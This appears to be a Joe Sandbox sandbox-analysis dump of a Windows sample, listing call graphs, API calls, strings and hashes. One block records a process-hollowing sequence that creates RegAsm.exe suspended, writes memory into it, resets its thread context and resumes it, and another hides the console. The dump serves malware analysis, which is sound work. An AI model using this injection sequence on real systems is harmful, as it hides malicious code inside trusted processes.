19149->19151 19152 febab 19150->19152 19154 104f0c ___free_lconv_mon 14 API calls 19150->19154 19153 104f0c ___free_lconv_mon 14 API calls 19151->19153 19152->19137 19155 104f0c ___free_lconv_mon 14 API calls 19152->19155 19153->19137 19154->19152 19155->19137 19219 fe9f1 LeaveCriticalSection 19156->19219 19158 f5584 19158->19119 19160 fec34 19159->19160 19161 fec42 19159->19161 19189 102b8e 19160->19189 19204 107363 19161->19204 19164 fec3e 19164->19136 19166 fecb8 19168 fbc2c __Getctype 11 API calls 19166->19168 19167 104eaf __dosmaperr 14 API calls 19169 fec74 19167->19169 19173 fecc2 19168->19173 19170 fec9c 19169->19170 19171 107363 std::_Locinfo::_Locinfo_ctor 43 API calls 19169->19171 19172 104f0c ___free_lconv_mon 14 API calls 19170->19172 19174 fec8b 19171->19174 19175 fecb1 19172->19175 19176 106a70 std::_Locinfo::_Locinfo_ctor 5 API calls 19173->19176 19178 fec9e 19174->19178 19179 fec92 19174->19179 19175->19136 19177 fecd0 19176->19177 19180 fea6e std::_Locinfo::_Locinfo_ctor 68 API calls 19177->19180 19181 102b8e std::_Locinfo::_Locinfo_ctor 65 API calls 19178->19181 19179->19166 19179->19170 19182 fecf9 19180->19182 19181->19170 19182->19136 19184 107739 _Fputc 19183->19184 19210 1073a0 19184->19210 19187 fb93b _Fputc 41 API calls 19188 feb16 19187->19188 19188->19142 19188->19143 19190 102ba4 19189->19190 19191 102bb8 19189->19191 19192 ff3fe __dosmaperr 14 API calls 19190->19192 19193 1041e0 __Getctype 41 API calls 19191->19193 19194 102ba9 19192->19194 19195 102bbd 19193->19195 19196 fbbff __strnicoll 41 API calls 19194->19196 19197 106a70 std::_Locinfo::_Locinfo_ctor 5 API calls 19195->19197 19199 102bb4 19196->19199 19198 102bc5 19197->19198 19200 10cdcc __Getctype 41 API calls 19198->19200 19199->19164 19201 102bca 19200->19201 19202 102196 std::_Locinfo::_Locinfo_ctor 65 API calls 19201->19202 19203 102c0c 19202->19203 19203->19164 19205 107376 _Fputc 19204->19205 19206 1070b8 std::_Locinfo::_Locinfo_ctor 43 API calls 19205->19206 19207 10738e 
19206->19207 19208 fb93b _Fputc 41 API calls 19207->19208 19209 fec59 19208->19209 19209->19166 19209->19167 19211 1073b7 19210->19211 19212 1073bb 19211->19212 19214 1073e3 19211->19214 19213 fbb82 _Fputc 41 API calls 19212->19213 19218 1073d9 19213->19218 19215 10747e std::_Locinfo::_Locinfo_ctor 43 API calls 19214->19215 19217 107405 19214->19217 19215->19217 19216 fbb82 _Fputc 41 API calls 19216->19218 19217->19216 19217->19218 19218->19187 19219->19158 19221 1041e0 __Getctype 41 API calls 19220->19221 19222 fee3f 19221->19222 19223 10507a __Getctype 41 API calls 19222->19223 19224 fee4f 19223->19224 19224->19022 19226 1041e0 __Getctype 41 API calls 19225->19226 19227 fed06 19226->19227 19228 10507a __Getctype 41 API calls 19227->19228 19229 fed16 19228->19229 19229->19027 19231 1041e0 __Getctype 41 API calls 19230->19231 19232 fee64 19231->19232 19233 10507a __Getctype 41 API calls 19232->19233 19234 f56df 19233->19234 19234->19030 19235 ff302 19234->19235 19236 ff30f 19235->19236 19241 ff34a 19235->19241 19237 fea63 _Yarn 15 API calls 19236->19237 19238 ff332 19237->19238 19238->19241 19244 107d3a 19238->19244 19241->19030 19242 fbc2c __Getctype 11 API calls 19243 ff360 19242->19243 19245 107d48 19244->19245 19246 107d56 19244->19246 19245->19246 19248 107d70 19245->19248 19247 ff3fe __dosmaperr 14 API calls 19246->19247 19252 107d60 19247->19252 19249 ff343 19248->19249 19251 ff3fe __dosmaperr 14 API calls 19248->19251 19249->19241 19249->19242 19250 fbbff __strnicoll 41 API calls 19250->19249 19251->19252 19252->19250 19254 f55cf 19253->19254 19255 f2a79 19253->19255 19256 fecc3 std::_Locinfo::_Locinfo_ctor 68 API calls 19254->19256 19255->19035 19255->19038 19256->19255 19258 f27d0 std::invalid_argument::invalid_argument 42 API calls 19257->19258 19259 f5013 19258->19259 19259->19053 19261 104eaf __dosmaperr 14 API calls 19260->19261 19262 fe4d7 19261->19262 19263 104f0c ___free_lconv_mon 14 API calls 19262->19263 19264 fe4e4 19263->19264 19265 fe4eb 
GetModuleHandleExW 19264->19265 19266 fe508 19264->19266 19265->19266 19267 fe438 16 API calls 19266->19267 19268 fe510 19267->19268 19268->18770 19268->18773 19282 ff3eb 19269->19282 19271 ff3af __dosmaperr 19272 ff3fe __dosmaperr 14 API calls 19271->19272 19273 ff3c2 19272->19273 19273->18773 19275 fe468 19274->19275 19276 fe444 19274->19276 19275->18718 19277 fe44a CloseHandle 19276->19277 19278 fe453 19276->19278 19277->19278 19279 fe459 FreeLibrary 19278->19279 19280 fe462 19278->19280 19279->19280 19281 104f0c ___free_lconv_mon 14 API calls 19280->19281 19281->19275 19283 104331 __dosmaperr 14 API calls 19282->19283 19284 ff3f0 19283->19284 19284->19271 19286 fe3c6 __FrameHandler3::FrameUnwindToState 19285->19286 19287 fe3cd GetLastError ExitThread 19286->19287 19288 fe3da 19286->19288 19289 1041e0 __Getctype 41 API calls 19288->19289 19290 fe3df 19289->19290 19299 106af1 19290->19299 19294 fe3f6 19307 fe599 19294->19307 19300 fe3ea 19299->19300 19301 106b03 GetPEB 19299->19301 19300->19294 19304 1069fc 19300->19304 19301->19300 19302 106b16 19301->19302 19310 106622 19302->19310 19305 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19304->19305 19306 106a18 19305->19306 19306->19294 19313 fe46f 19307->19313 19311 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19310->19311 19312 10663e 19311->19312 19312->19300 19314 104331 __dosmaperr 14 API calls 19313->19314 19316 fe47a 19314->19316 19315 fe4bc ExitThread 19316->19315 19318 fe493 19316->19318 19322 106a37 19316->19322 19319 fe4a6 19318->19319 19320 fe49f CloseHandle 19318->19320 19319->19315 19321 fe4b2 FreeLibraryAndExitThread 19319->19321 19320->19319 19321->19315 19323 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19322->19323 19324 106a50 19323->19324 19324->19318 19326 f51b7 __EH_prolog3_GS 19325->19326 19335 f23e0 19326->19335 19329 f2490 std::_Throw_Cpp_error 43 API calls 19330 f51e0 19329->19330 19339 f2a10 19330->19339 19332 f51e8 19344 f76c1 19332->19344 19336 f2401 19335->19336 19336->19336 

        Control-flow Graph

        APIs
        • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,022C00FF,022C00EF), ref: 022C02FC
        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 022C030F
        • Wow64GetThreadContext.KERNEL32(00000120,00000000), ref: 022C032D
        • ReadProcessMemory.KERNELBASE(0000011C,?,022C0143,00000004,00000000), ref: 022C0351
        • VirtualAllocEx.KERNELBASE(0000011C,?,?,00003000,00000040), ref: 022C037C
        • TerminateProcess.KERNELBASE(0000011C,00000000), ref: 022C039B
        • WriteProcessMemory.KERNELBASE(0000011C,00000000,?,?,00000000,?), ref: 022C03D4
        • WriteProcessMemory.KERNELBASE(0000011C,00400000,?,?,00000000,?,00000028), ref: 022C041F
        • WriteProcessMemory.KERNELBASE(0000011C,?,?,00000004,00000000), ref: 022C045D
        • Wow64SetThreadContext.KERNEL32(00000120,023F0000), ref: 022C0499
        • ResumeThread.KERNELBASE(00000120), ref: 022C04A8
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2601466933.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_22c0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
        • API String ID: 2440066154-1257834847
        • Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
        • Instruction ID: 041cbde26a960da5f551736547e992549d5cd6936eab447ac7d10db5ee5554cc
        • Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
        • Instruction Fuzzy Hash: 66B1E67264024AAFDB60CFA8CC80BDA77A5FF88714F158524EA0CAB345D774FA41CB94

        Control-flow Graph

        APIs
        • CreateThread.KERNELBASE(00000000,00000000,00114BD0,00000000,00000000,00000000), ref: 00114BBF
        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,?,?,?,?,?,?,?,?,00114C76), ref: 00114BC8
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: CreateObjectSingleThreadWait
        • String ID: C$Earth$Own head
        • API String ID: 1891408510-3365287836
        • Opcode ID: 31ae03ccb2ad55af86e0df196d530a29d97038cc79a79fe72301634f11ac2591
        • Instruction ID: 6df77a4c96a97a777ee052705db83638bbb4226d1a30e51c5e5f3048cb362396
        • Opcode Fuzzy Hash: 31ae03ccb2ad55af86e0df196d530a29d97038cc79a79fe72301634f11ac2591
        • Instruction Fuzzy Hash: 83716471A083058BD718DF748CC5BEBB7E4AF88740F140A3CF59697592E760EA88C796
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 187476d68e2606cdce371126295309166868084c328b2d7ce50f7c335d6a9bbd
        • Instruction ID: c1f723b623ad3002038ea3619755f7af699cac35751f7d0f9db5fda30546dd1c
        • Opcode Fuzzy Hash: 187476d68e2606cdce371126295309166868084c328b2d7ce50f7c335d6a9bbd
        • Instruction Fuzzy Hash: 36F0A071A11320DBCB16C748C405B9973FCEB08B11F1140A6E440EB180C7B0DE40C7D0

        Control-flow Graph

        APIs
        • GetModuleHandleA.KERNEL32(user32.dll,ShowWindow,429EDEEC), ref: 00114D55
        • GetProcAddress.KERNEL32(00000000), ref: 00114D5C
        • GetConsoleWindow.KERNELBASE(?,00000000), ref: 00114D6B
        • GetModuleHandleA.KERNEL32(kernel32.dll,FreeConsole), ref: 00114D7F
        • GetProcAddress.KERNEL32(00000000), ref: 00114D86
        • FreeConsole.KERNELBASE ref: 00114D92
          • Part of subcall function 00114000: GetCurrentThreadId.KERNEL32 ref: 0011406A
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: AddressConsoleHandleModuleProc$CurrentFreeThreadWindow
        • String ID: FreeConsole$ShowWindow$kernel32.dll$user32.dll
        • API String ID: 245968307-4003964729
        • Opcode ID: a7e3879722f35b4b1906ef073c510f59344a0ce5d58ee2e24ca33ba75d0a4cbb
        • Instruction ID: 3c5e3d67fa50986d53e28f89bb7642491ca829d96c351b7403ea188f170bd4b5
        • Opcode Fuzzy Hash: a7e3879722f35b4b1906ef073c510f59344a0ce5d58ee2e24ca33ba75d0a4cbb
        • Instruction Fuzzy Hash: E911B271A40704EBDB04EBF4ED09BDEBBF9EB88B51F108535F515D3680E774998086A1

        Control-flow Graph

        APIs
        • FreeLibrary.KERNEL32(00000000,?,001065A1,?,?,00000001,00000000,?,?,0010680B,00000021,FlsSetValue,001194CC,001194D4,00000001), ref: 00106555
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: FreeLibrary
        • String ID: api-ms-$ext-ms-
        • API String ID: 3664257935-537541572
        • Opcode ID: d286f0bf8783b03e52e71f07f2a4e65ca7e54f6b482fa8148d2b76966a032b9f
        • Instruction ID: d0c55aa1a2788ec2d02509efb939ba710c8e86ad815d905160a517f432bf6c4c
        • Opcode Fuzzy Hash: d286f0bf8783b03e52e71f07f2a4e65ca7e54f6b482fa8148d2b76966a032b9f
        • Instruction Fuzzy Hash: F3213A32A01321EBCB269B64EC44A9A3768DF467B0F114160F986E72D4DBB0EF50C6D0

        Control-flow Graph

        APIs
        • GetCurrentThreadId.KERNEL32 ref: 0011406A
        • std::_Throw_Cpp_error.LIBCPMT ref: 001140A5
        • std::_Throw_Cpp_error.LIBCPMT ref: 001140AC
        • std::_Throw_Cpp_error.LIBCPMT ref: 001140B3
        • std::_Throw_Cpp_error.LIBCPMT ref: 001140BA
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: Cpp_errorThrow_std::_$CurrentThread
        • String ID: Success created.
        • API String ID: 2261580123-2637490038
        • Opcode ID: a4626639991cd517abe6e7bca2d15cb689551c728d09833b2ed92192369fa062
        • Instruction ID: 4a84fcf157ef59b0985518eebb106cb70628e06111e9db252884a31e9890f08f
        • Opcode Fuzzy Hash: a4626639991cd517abe6e7bca2d15cb689551c728d09833b2ed92192369fa062
        • Instruction Fuzzy Hash: A111A7716407056BE3743BB54C03BEB7594AF05F82F144539FB48AA9C3EBA2944497A2

        Control-flow Graph

        APIs
        • CreateThread.KERNELBASE(?,?,Function_0000E3BA,00000000,?,?), ref: 000FE55F
        • GetLastError.KERNEL32 ref: 000FE56B
        • __dosmaperr.LIBCMT ref: 000FE572
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: CreateErrorLastThread__dosmaperr
        • String ID:
        • API String ID: 2744730728-0
        • Opcode ID: cf9ff95f71fb63d13eec6e6f3b082a7032d81260bf2d5885d4ff61af5b59530f
        • Instruction ID: 99cb7cff44634802c38a76902e74741c48346035791924527e2f5621ac5f3c3b
        • Opcode Fuzzy Hash: cf9ff95f71fb63d13eec6e6f3b082a7032d81260bf2d5885d4ff61af5b59530f
        • Instruction Fuzzy Hash: 8B01DE7290124DEFDF159FA0CC05AFE3BA5EF40724F004028FA01969A1EB70CA50FBA0

        Control-flow Graph

        APIs
          • Part of subcall function 001081B7: GetConsoleOutputCP.KERNEL32(429EDEEC,00000000,00000000,00000000), ref: 0010821A
        • WriteFile.KERNEL32(?,00000000,?,0011F498,00000000,0000000C,00000000,00000000,?,00000000,0011F498,00000010,00100642,00000000,00000000,00000000), ref: 00108BD6
        • GetLastError.KERNEL32(?,00000000), ref: 00108BE0
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ConsoleErrorFileLastOutputWrite
        • String ID:
        • API String ID: 2915228174-0
        • Opcode ID: 2e902ea2d15e57685d848a5aa034b40d074fb4c9b964558d5d85f17a0644362b
        • Instruction ID: c1c54f07a84d86c4618f77f994cd63e952c090bd49637b310402f599c1a6fbd3
        • Opcode Fuzzy Hash: 2e902ea2d15e57685d848a5aa034b40d074fb4c9b964558d5d85f17a0644362b
        • Instruction Fuzzy Hash: 7761B3B1D08249EFDF158FA8C984AEEBBB9EF19304F144055E8C4A7292DBB1D941CB60

        Control-flow Graph

        APIs
        • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040), ref: 00114C66
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: AllocVirtual
        • String ID: MZx
        • API String ID: 4275171209-2575928145
        • Opcode ID: 3423983b1c73f3c931f42c26971118d040d1e4f6179b30d4f0f1280b34241f6c
        • Instruction ID: 6f963326315edf353d158c0f7a91b20700c8b4b3e12a0d87616c942631ada40c
        • Opcode Fuzzy Hash: 3423983b1c73f3c931f42c26971118d040d1e4f6179b30d4f0f1280b34241f6c
        • Instruction Fuzzy Hash: 0031A375E003089BDB04DFA8DD81BEEB7B4EF1D740F104269F904B7682EB759A948764

        Control-flow Graph

        APIs
        • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000,?,00108BBC,00000000,00000000,00000000,?,0000000C,00000000), ref: 0010870B
        • GetLastError.KERNEL32(?,00108BBC,00000000,00000000,00000000,?,0000000C,00000000,00000000,?,00000000,0011F498,00000010,00100642,00000000,00000000), ref: 00108731
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorFileLastWrite
        • String ID:
        • API String ID: 442123175-0
        • Opcode ID: 30eda54b36b46e10513e3154b2e047d98c9ff8654da0febdb2f77b739ef01fa7
        • Instruction ID: f37a99e807d4a647757bc86a65174b219e453600ab575909730c64add7b7b6b7
        • Opcode Fuzzy Hash: 30eda54b36b46e10513e3154b2e047d98c9ff8654da0febdb2f77b739ef01fa7
        • Instruction Fuzzy Hash: 9121A234A00219DBCB19CF29DC909EDB7B5EB4C301F2480A9EA8AD7251DB709D82CB61

        Control-flow Graph

        APIs
        • GetStdHandle.KERNEL32(000000F6), ref: 001061CE
        • GetFileType.KERNELBASE(00000000), ref: 001061E0
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: FileHandleType
        • String ID:
        • API String ID: 3000768030-0
        • Opcode ID: db693a10bf974189e642e8a96329801449ac4d79d5136970c2f0366c7da497ae
        • Instruction ID: 33543366ed0b741e81838742a25f54860137798cee1cd648fe2ba546298aa2ca
        • Opcode Fuzzy Hash: db693a10bf974189e642e8a96329801449ac4d79d5136970c2f0366c7da497ae
        • Instruction Fuzzy Hash: 4A11E9315047429ADB344F3EDC886267ED59B96330B380719E0FAC65F2C3B0D8E6D641

        Control-flow Graph

        APIs
        • GetLastError.KERNEL32(0011F048,0000000C), ref: 000FE3CD
        • ExitThread.KERNEL32 ref: 000FE3D4
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorExitLastThread
        • String ID:
        • API String ID: 1611280651-0
        • Opcode ID: 600bba551166580000cda6da0c5bbfb624b86c87f2ba4ac0579bbf67c78fac5f
        • Instruction ID: c48a4242df8a4864de0ad56d3d603d5efcab7aab034c40f27dbca0987a1e06ca
        • Opcode Fuzzy Hash: 600bba551166580000cda6da0c5bbfb624b86c87f2ba4ac0579bbf67c78fac5f
        • Instruction Fuzzy Hash: 4AF0C270940608EFDB14ABB0D94AAAE3BB1FF59700F108159F5019BAA2CBB45A41DBA1

        Control-flow Graph

        APIs
        • RtlFreeHeap.NTDLL(00000000,00000000,?,0010C57D,?,00000000,?,?,0010C81E,?,00000007,?,?,0010CD17,?,?), ref: 00104F22
        • GetLastError.KERNEL32(?,?,0010C57D,?,00000000,?,?,0010C81E,?,00000007,?,?,0010CD17,?,?), ref: 00104F2D
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorFreeHeapLast
        • String ID:
        • API String ID: 485612231-0
        • Opcode ID: 15ccec119d61075604fe64e8038ea3f5afe21195b8763fd76dd59e1d4262285f
        • Instruction ID: 4e0f9c11f8f9276b4030658de06adbf9d4240895c3b84268de6aee39612568c8
        • Opcode Fuzzy Hash: 15ccec119d61075604fe64e8038ea3f5afe21195b8763fd76dd59e1d4262285f
        • Instruction Fuzzy Hash: 02E08631100605ABCB152BA4ED09BE93A599F84755F104060F70C9A4A1DF7089C08794

        Control-flow Graph

        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 36a114f48129b07f88941a07a36be4ddfa0f47e9764112a92cdab29d78eeb2f4
        • Instruction ID: d65d6e04093454cbda1f648eedd76d67f726e25cb520418a51a8e878b62e0979
        • Opcode Fuzzy Hash: 36a114f48129b07f88941a07a36be4ddfa0f47e9764112a92cdab29d78eeb2f4
        • Instruction Fuzzy Hash: D531983191051E9FCB55CF64C9409FDB7F9BF09310B184159D601A3A90EB72EE44DB50

        Control-flow Graph

        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 902c9b452677ec06fdcb28c7a560fece48e1bbe08c6f0f9a33ff59ca2c123724
        • Instruction ID: 5b67ad2fd7586c6550277ecc2c2481a61bc17f84157a10a8010e8f6a43f7eec7
        • Opcode Fuzzy Hash: 902c9b452677ec06fdcb28c7a560fece48e1bbe08c6f0f9a33ff59ca2c123724
        • Instruction Fuzzy Hash: EC01D437700225AFDB269F69EC4195A37E7ABC53F07298620F944CB5D8EBB0D861C790
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: __floor_pentium4
        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
        • API String ID: 4168288129-2761157908
        • Opcode ID: 09f575395fc5b91562471791b254729d5b340b94d6b688dc575fe1ada46878e0
        • Instruction ID: 4bb49e5798749ae045ead188a28f1ad40990007d73231863554395187ef29ef4
        • Opcode Fuzzy Hash: 09f575395fc5b91562471791b254729d5b340b94d6b688dc575fe1ada46878e0
        • Instruction Fuzzy Hash: 1CD23B71E082298FDB75CE28CD417EAB7B5EB44344F1445EAD48DE7680D7B8AE828F41
        APIs
        • GetLocaleInfoW.KERNEL32(?,2000000B,0010E046,00000002,00000000,?,?,?,0010E046,?,00000000), ref: 0010DDC1
